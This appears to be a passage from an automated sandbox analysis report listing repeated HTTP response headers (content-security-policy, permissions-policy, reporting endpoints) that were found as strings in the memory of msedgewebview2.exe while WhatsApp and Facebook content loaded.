                  Source: msedgewebview2.exe, 00000020.00000003.2551019821.00001B440044D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:text/css;charset=utf-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 13:14:51 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src '
                  Source: msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 16:43:55 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com ht
                  Source: msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 16:43:55 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com ht
                  Source: msedgewebview2.exe, 00000020.00000003.2573024744.00001B4400444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brvary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 14:57:48 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsap
                  Source: msedgewebview2.exe, 00000020.00000003.2573024744.00001B4400444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brvary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 14:57:48 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsap
                  Source: msedgewebview2.exe, 00000020.00000003.2581556423.00001B44007C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brvary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 14:57:48 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsap
                  Source: msedgewebview2.exe, 00000020.00000003.2581556423.00001B44007C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brvary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 14:57:48 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsap
                  Source: msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-type:image/pnglast-modified:Mon, 01 Jan 2001 08:00:00 GMTcontent-md5:SiW+DJXSgABep42D+xi5Ig==expires:Wed, 05 Mar 2025 20:06:50 GMTcache-control:public,max-age=31536000,immutablereport-to:{"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy-report-only:clipboard-write=();report-to="permissions_policy"permissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), clipboard-read=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"x-content-type-options:nosniffreporting-endpoints:permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"x-fb-debug:pZkAJD7ouBN5bJ04Xo8AjtYl+7iF3KPTuT7GuO10deABs2mRYEHp65tdDWWYVYE/2CjZWoAnXNAcXDPoqnqUPQ==cross-origin-resource-policy:cross-origintiming-allow-origin:*access-control-allow-origin:*accept-ranges:bytescontent-length:643date:Sun, 10 Mar 2024 16:46:34 GMTx-fb-connection-quality:MODERATE; q=0.3, rtt=223, rtx=0, c=2011, mss=1232, tbw=5898515, tp=4923, tpl=0, uplat=0, ullat=-1alt-svc:h3=":443"; ma=86400priority:u=1,i equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-type:image/pnglast-modified:Mon, 01 Jan 2001 08:00:00 GMTcontent-md5:xLWjtClzX1uuuuJMJlqnCw==expires:Tue, 04 Mar 2025 10:10:59 GMTcache-control:public,max-age=31536000,immutablereport-to:{"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy-report-only:clipboard-read=(), clipboard-write=();report-to="permissions_policy"permissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"x-content-type-options:nosniffreporting-endpoints:permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"x-fb-debug:l7Y/M6rqLRc2Kxc8tdcsCldDQmGG3IuCoDBiKERGJCvX7rZ2qzlBmYZ/5UgvN2seea+i0EjYerpvl9jTnMZiKg==cross-origin-resource-policy:cross-origintiming-allow-origin:*access-control-allow-origin:*accept-ranges:bytescontent-length:1222date:Sun, 10 Mar 2024 16:46:33 GMTx-fb-connection-quality:MODERATE; q=0.3, rtt=260, rtx=0, c=2011, mss=1232, tbw=5896835, tp=4918, tpl=0, uplat=0, ullat=-1alt-svc:h3=":443"; ma=86400priority:u=3,i equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200reporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: *.whatsapp.com *.whatsapp.net *.twitter.com *.facebook.com *.facebook.net 'unsafe-inline' 'unsafe-eval';style-src 'self' data: blob: *.whatsapp.com *.whatsapp.net 'unsafe-inline' *.facebook.com;connect-src 'self' data: blob: *.whatsapp.com *.whatsapp.net wss://*.facebook.com:* *.fbcdn.net;font-src data: *.whatsapp.com *.whatsapp.net *.facebook.com static.xx.fbcdn.net https://fonts.gstatic.com;img-src 'self' data: blob: *.whatsapp.com *.whatsapp.net *.facebook.com *.fbcdn.net static.xx.fbcdn.net *.ytimg.com *.twitter.com;media-src 'self' data: blob: *.fbcdn.net;frame-src 'self' data: blob: *.twitter.com *.facebook.com *.youtube-nocookie.com *.youtube.com *.whatsapp.com;block-all-mixed-content;upgrade-insecure-requests;document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:same-origin-allow-popups;report-to="coop_report"pragma:no-cachecache-control:private, no-cache, no-store, must-revalidateexpires:Sat, 01 Jan 2000 00:00:00 GMTx-content-type-options:nosniffx-xss-protection:0x-frame-options:DENYorigin-agent-cluster:?0access-control-expose-headers:X-FB-Debug, X-Loader-Lengthaccess-control-allow-methods:OPTIONSaccess-control-allow-credentials:trueaccess-control-allow-origin:https://www.whatsapp.comvary:Originstrict-transport-security:max-age=31536000; preload; includeSubDomains
                  Source: msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200reporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: *.whatsapp.com *.whatsapp.net *.twitter.com *.facebook.com *.facebook.net 'unsafe-inline' 'unsafe-eval';style-src 'self' data: blob: *.whatsapp.com *.whatsapp.net 'unsafe-inline' *.facebook.com;connect-src 'self' data: blob: *.whatsapp.com *.whatsapp.net wss://*.facebook.com:* *.fbcdn.net;font-src data: *.whatsapp.com *.whatsapp.net *.facebook.com static.xx.fbcdn.net https://fonts.gstatic.com;img-src 'self' data: blob: *.whatsapp.com *.whatsapp.net *.facebook.com *.fbcdn.net static.xx.fbcdn.net *.ytimg.com *.twitter.com;media-src 'self' data: blob: *.fbcdn.net;frame-src 'self' data: blob: *.twitter.com *.facebook.com *.youtube-nocookie.com *.youtube.com *.whatsapp.com;block-all-mixed-content;upgrade-insecure-requests;document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:same-origin-allow-popups;report-to="coop_report"pragma:no-cachecache-control:private, no-cache, no-store, must-revalidateexpires:Sat, 01 Jan 2000 00:00:00 